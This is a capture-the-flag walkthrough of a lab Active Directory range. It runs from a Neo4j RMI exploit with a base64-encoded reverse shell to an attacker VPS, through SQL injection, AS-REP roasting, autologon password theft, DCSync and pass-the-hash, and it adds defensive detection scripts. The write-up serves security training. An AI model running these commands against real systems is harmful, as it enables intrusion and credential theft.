Chunqiu Yunjing (春秋云境) - Time

Neo4j RCE

As usual, scan the ports with fscan64. Next time I'll try masscan; I've heard it works well.
```
.\fscan64.exe -h 39.101.195.58 -p 1-65535
```

```
   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 39.101.195.58 is alive
[*] Icmp alive hosts len is: 1
39.101.195.58:22 open
39.101.195.58:1337 open
39.101.195.58:7473 open
39.101.195.58:7474 open
39.101.195.58:7687 open
39.101.195.58:34317 open
[*] alive ports len is: 6
start vulscan
已完成 0/6 [-] webtitle https://39.101.195.58:34317 Get "https://39.101.195.58:34317": EOF
[*] WebTitle: http://39.101.195.58:7474 code:303 len:0 title:None 跳转url: http://39.101.195.58:7474/browser/
[*] WebTitle: http://39.101.195.58:7474/browser/ code:200 len:3279 title:Neo4j Browser
[*] WebTitle: https://39.101.195.58:7473 code:303 len:0 title:None 跳转url: https://39.101.195.58:7473/browser/
[*] WebTitle: https://39.101.195.58:7687 code:400 len:50 title:None
[*] WebTitle: https://39.101.195.58:7473/browser/ code:200 len:3279 title:Neo4j Browser
已完成 6/6
[*] 扫描结束,耗时: 6m2.1584069s
```
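There is a Neo4j RCE here.

rhino_gadget.jar: https://github.com/zwjjustdoit/CVE-2021-34371.jar

```
java -jar rhino_gadget.jar rmi://39.101.195.58:1337 "bash -c {echo,YmFzaCAta......S4xNDgvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"
```

This targets port 1337.

Run on the VPS:

The command succeeded and a shell came back; look for the flag file.

Since the flag can be read directly, I'll skip privilege escalation to save time...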
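Internal network reconnaissance

Transfer fscan and frp with wget; remember to switch to /tmp or the user's home directory first.

Next time I'll try a different proxy tool.

```
wget http://ip/fscan_amd64
wget http://ip/frpc
wget http://ip/frpc.toml
```

Make them executable and run the scan:

```
chmod +x *
./fscan_amd64 -h 172.22.6.0/24 >> 5.txt
cat 5.txt
```

Scan several times; sometimes hosts are missed or nothing comes back.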
```
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.6.12 is alive
(icmp) Target 172.22.6.25 is alive
(icmp) Target 172.22.6.36 is alive
(icmp) Target 172.22.6.38 is alive
[*] Icmp alive hosts len is: 4
172.22.6.12:139 open
172.22.6.25:445 open
172.22.6.25:139 open
172.22.6.12:445 open
172.22.6.25:135 open
172.22.6.12:135 open
172.22.6.38:80 open
172.22.6.38:22 open
172.22.6.12:88 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo:
[*]172.22.6.25
   [->]WIN2019
   [->]172.22.6.25
[*] NetInfo:
[*]172.22.6.12
   [->]DC-PROGAME
   [->]172.22.6.12
[*] NetBios: 172.22.6.25 XIAORANG\WIN2019
[*] 172.22.6.12 (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.6.12 [+] DC DC-PROGAME.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.6.38 code:200 len:1531 title:后台登录
已完成 9/9
[*] 扫描结束,耗时: 14.837356535s
```
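Same as usual, four machines:

```
172.22.6.12  domain controller (DC)
172.22.6.25  domain machine
172.22.6.36  already compromised (no privilege escalation)
172.22.6.38  domain machine (web admin login page)
```

Setting up the proxy

```
./frps -c ./frps.toml   # VPS
./frpc -c ./frpc.toml   # victim machine
```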
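SQL injection

Start with the web service on 172.22.6.38.

Then capture the request with Burp Suite (bp). The only change needed is to add a downstream proxy to Burp, that is, the address of the proxy server, with the proxy type set to SOCKS5. Everything else between the browser and Burp stays the same.

Note that the browser's proxy extension must be turned off, for example the extension in the top-right corner of the screenshot above.

After that, capture traffic as usual.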
```
POST /index.php HTTP/1.1
Host: 172.22.6.38
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.22.6.38
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.22.6.38/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

username=admin&password=admin
```
Save it as 1.txt, then fire up sqlmap without a second thought!

```
proxychains4 sqlmap -r 1.txt --dbs
proxychains4 sqlmap -r 1.txt -D oa_db --tables
proxychains4 sqlmap -r 1.txt -D oa_db -T oa_f1Agggg -C flag02 --dump
```

AS-REP Roasting

Check whether there is any other useful data; look at the admin and users tables.

```
administrator: bo2y8kAL3HnXUiQo
```
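Flag 1 hinted at looking for accounts that do not have pre-authentication set, so first extract the usernames. Load the data into vim, select columns with Ctrl+V, and delete them with d,

leaving only the username column.

Then use find-and-replace in the text file to strip the extra spaces and the @xiaorang.lab suffix.

```
proxychains4 python3 GetNPUsers.py -dc-ip 172.22.6.12 -usersfile 2.txt xiaorang.lab/
```

Pre-authentication is enabled by default. When it has been disabled for an account, an attacker can request a ticket for that user from the domain controller's Kerberos port 88, and the DC returns the TGT together with the Login Session Key encrypted with that user's hash, without performing any verification.

The attacker can therefore crack the Login Session Key encrypted with the user's hash offline. If the wordlist is strong enough, this may recover the user's plaintext password.

It produced a result: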
```
$krb5asrep$23$zhangxin@XIAORANG.LAB:3a3ff2711e347d1beba0802d38566468$bf07c6fd4ffb3d9d459329347641dd1618c720bd0a9e156eba973489c40f39fe92b9da9a42bb083d7c0dfbc98a2c3413dc6b97394ff5622de380c2e74aeda45e3dd17d5cbee9214fa0e441722f05f3d65cd0b9352b62309c2ddcf14bc19d304a32dfdbf3313577eda80b806a2263712352d95a53f92bda49eec8e25aab65b72216ab71013edfb06ba30a271d56bfcd8c2db52c1e7f9783e22a8e845c3bea5fac885c65b5218cce1afe96b46bf08fc6c2bbdc9f2aaaac3ac404387ede6460e1eb8cd99e5b7c3c381be6d28dfef3063053aa8c0365faafd936221583e67a40382bcce519087074c39fd8e72907
```
Save it to 1.txt and crack it with hashcat; make sure the rockyou wordlist is in the current directory.

```
hashcat -m 18200 1.txt -a 0 ./rockyou.txt --force
```

```
Account:  zhangxin@XIAORANG.LAB
Password: strawberry
```
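From the defender's side, the disabled pre-authentication described above can be found both in the directory and in the DC's Security log. The following is an added example, not part of the original write-up: it flags enabled accounts with the `DONT_REQ_PREAUTH` bit in `userAccountControl` and event 4768 successes issued with pre-authentication type 0. The account list and the JSON-lines event export are constructed sample data, and the export layout is an assumption.

```python
import json

DONT_REQ_PREAUTH = 0x00400000  # userAccountControl: do not require Kerberos pre-auth
ACCOUNTDISABLE = 0x00000002
RC4_HMAC = 0x17                # etype 23: the "$23$" in $krb5asrep$23$ / hashcat -m 18200

# Constructed export of (sAMAccountName, userAccountControl); not data from the lab.
ACCOUNTS = [
    ("alice", 0x200),                                    # NORMAL_ACCOUNT only
    ("svc_report", 0x200 | 0x10000 | DONT_REQ_PREAUTH),  # enabled, pre-auth disabled
    ("old_temp", 0x200 | ACCOUNTDISABLE | DONT_REQ_PREAUTH),
]

# Constructed Security-log records, one JSON object per line (assumed export layout;
# field names follow the EventData of event 4768, "a Kerberos TGT was requested").
EVENTS = """
{"EventID": 4768, "TargetUserName": "alice", "IpAddress": "::ffff:10.0.0.21", "Status": "0x0", "TicketEncryptionType": "0x12", "PreAuthType": "2"}
{"EventID": 4768, "TargetUserName": "svc_report", "IpAddress": "::ffff:10.0.0.77", "Status": "0x0", "TicketEncryptionType": "0x17", "PreAuthType": "0"}
{"EventID": 4768, "TargetUserName": "bob", "IpAddress": "::ffff:10.0.0.77", "Status": "0x6", "TicketEncryptionType": "0xffffffff", "PreAuthType": "-"}
{"EventID": 4624, "TargetUserName": "alice", "IpAddress": "10.0.0.21"}
"""


def preauth_disabled(accounts):
    """Return enabled accounts whose userAccountControl has DONT_REQ_PREAUTH set."""
    return [name for name, uac in accounts
            if (uac & DONT_REQ_PREAUTH) and not (uac & ACCOUNTDISABLE)]


def asrep_without_preauth(event_lines):
    """Return successful 4768 events where the TGT was issued with no pre-auth."""
    findings = []
    for line in event_lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 4768 or ev.get("Status") != "0x0":
            continue                      # not a successful TGT request
        if ev.get("PreAuthType") != "0":
            continue                      # pre-authentication was performed
        findings.append({
            "user": ev["TargetUserName"],
            "source": ev["IpAddress"],
            "rc4": int(ev["TicketEncryptionType"], 16) == RC4_HMAC,
        })
    return findings


if __name__ == "__main__":
    print("pre-auth disabled:", preauth_disabled(ACCOUNTS))
    for finding in asrep_without_preauth(EVENTS):
        print("AS-REP without pre-auth:", finding)
```

Re-enabling pre-authentication on every account the first check reports removes the condition the second check watches for.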
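Retrieving the Windows autologon password

The credentials just obtained can be used to connect to 172.22.6.25 over RDP.

Upload SharpHound to collect data.

Check the users.

When a user has a session on a computer, the credentials stay in memory, which indicates that the user yuxuan has logged on to WIN2019. Many users like to configure their computer to log on automatically,

so try retrieving this user's password.

```
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
```

Or retrieve it with msf:

```
meterpreter > run windows/gather/credentials/windows_autologin
```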
```
AutoAdminLogon    REG_SZ    1
DefaultUserName    REG_SZ    yuxuan
DefaultPassword    REG_SZ    Yuxuan7QbrgZ3L
DefaultDomainName    REG_SZ    xiaorang.lab
```
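The same `reg query` output can be used to audit hosts for this exposure. The following is an added example, not part of the original write-up: it parses the Winlogon values and classifies each host, including the case where autologon was switched off but `DefaultPassword` was left behind. Host names and values are constructed, and the parser assumes value names without spaces.

```python
import re

# Constructed `reg query` output for the Winlogon key on three hosts (invented values).
KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
SAMPLES = {
    "HOST-A": KEY + """
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    kiosk
    DefaultPassword    REG_SZ    Example Pass 123
    DefaultDomainName    REG_SZ    example.lab
""",
    "HOST-B": KEY + """
    AutoAdminLogon    REG_SZ    0
    DefaultUserName    REG_SZ    alice
    Shell    REG_SZ    explorer.exe
""",
    "HOST-C": KEY + """
    AutoAdminLogon    REG_SZ    0
    DefaultUserName    REG_SZ    bob
    DefaultPassword    REG_SZ    LeftoverSecret
""",
}

# Indented "name  TYPE  data" lines; data may be empty or contain spaces.
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)(?:\s+(.*\S))?\s*$")


def parse_reg_query(text):
    """Return {value name: data} for every value line in `reg query` output."""
    values = {}
    for line in text.splitlines():
        match = VALUE_LINE.match(line)
        if match:
            values[match.group(1)] = match.group(3) or ""
    return values


def audit_autologon(text):
    """Classify one host's Winlogon key by how the autologon password is exposed."""
    values = parse_reg_query(text)
    enabled = values.get("AutoAdminLogon") == "1"
    has_password = bool(values.get("DefaultPassword"))
    if enabled and has_password:
        return "cleartext-autologon"          # password readable from the registry
    if has_password:
        return "stale-cleartext-password"     # autologon off, password left behind
    if enabled:
        return "autologon-no-registry-password"  # password kept elsewhere, e.g. an LSA secret
    return "ok"


if __name__ == "__main__":
    for host, output in SAMPLES.items():
        print(host, audit_autologon(output))
```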
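Switch to this user and log in over RDP.

BloodHound's analysis of the relationships in the domain shows that this user abuses the SID History feature.

HasSIDHistory: an attribute that exists to support domain migration scenarios. When an object is migrated from one domain to another, a new SID is created in the new domain as the object's objectSid, and the SID from the previous domain is added to the object's sIDHistory attribute. The object thereby keeps the access rights that belong to its SID in the original domain.

In other words, although the user no longer belongs to the former domain, it still holds that domain's privileges.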
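To review sIDHistory values on the defensive side, the binary SIDs returned by LDAP have to be decoded first. The following is an added example, not part of the original write-up: it decodes `objectSid` and `sIDHistory` and flags entries that carry a SID from the object's own domain or a well-known privileged RID. Both checks are heuristics chosen for this example, and all SIDs and account names are constructed.

```python
import struct

# Well-known privileged RIDs (relative to a domain SID).
PRIVILEGED_RIDS = {500: "Administrator", 512: "Domain Admins",
                   518: "Schema Admins", 519: "Enterprise Admins"}


def sid_to_str(raw):
    """Decode a binary SID as stored in objectSid / sIDHistory."""
    revision, count = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")                  # 48-bit, big-endian
    subs = struct.unpack("<%dI" % count, raw[8:8 + 4 * count])   # 32-bit, little-endian
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def sid_bytes(sid):
    """Inverse of sid_to_str; used only to build the constructed sample below."""
    parts = sid.split("-")
    subs = [int(p) for p in parts[3:]]
    return (bytes([int(parts[1]), len(subs)]) + int(parts[2]).to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def audit_sid_history(objects):
    """Return (name, historic SID, reasons) for every suspicious sIDHistory entry."""
    findings = []
    for name, object_sid, history in objects:
        domain = sid_to_str(object_sid).rsplit("-", 1)[0]
        for raw in history:
            old = sid_to_str(raw)
            old_domain, rid = old.rsplit("-", 1)
            reasons = []
            if old_domain == domain:          # migration only adds SIDs of another domain
                reasons.append("same-domain SID")
            if int(rid) in PRIVILEGED_RIDS:
                reasons.append("privileged RID (%s)" % PRIVILEGED_RIDS[int(rid)])
            if reasons:
                findings.append((name, old, reasons))
    return findings


# Constructed sample: CURRENT is the live domain, OLD a retired source domain.
CURRENT = "S-1-5-21-1111111111-2222222222-3333333333"
OLD = "S-1-5-21-1234567890-987654321-1122334455"
OBJECTS = [
    ("migrated_user", sid_bytes(CURRENT + "-1105"), [sid_bytes(OLD + "-2301")]),
    ("helpdesk01", sid_bytes(CURRENT + "-1107"), [sid_bytes(CURRENT + "-500")]),
    ("legacy_admin", sid_bytes(CURRENT + "-1110"), [sid_bytes(OLD + "-512")]),
    ("plain_user", sid_bytes(CURRENT + "-1111"), []),
]

if __name__ == "__main__":
    for finding in audit_sid_history(OBJECTS):
        print(finding)
```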
PTH

Because the user yuxuan retains domain administrator access, mimikatz can be used to grab the Administrator hash.

```
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit
```

```
04d93ffd6f5f6e4490e0de23f240a5e9
```

Lateral movement with smbexec:

```
proxychains4 python3 smbexec.py -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 administrator@172.22.6.12
```

```
type C:\Users\Administrator\flag\flag*
```

Then use this high-privilege account to move laterally back to the machine that was accessed over RDP earlier.

```
proxychains4 python3 wmiexec.py XIAORANG/administrator@172.22.6.25 -hashes :04d93ffd6f5f6e4490e0de23f240a5e9
```

```
type C:\Users\Administrator\flag\flag*
```

Or:

```
proxychains4 crackmapexec smb 172.22.6.25 -u administrator -H 04d93ffd6f5f6e4490e0de23f240a5e9 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
```

Done and done!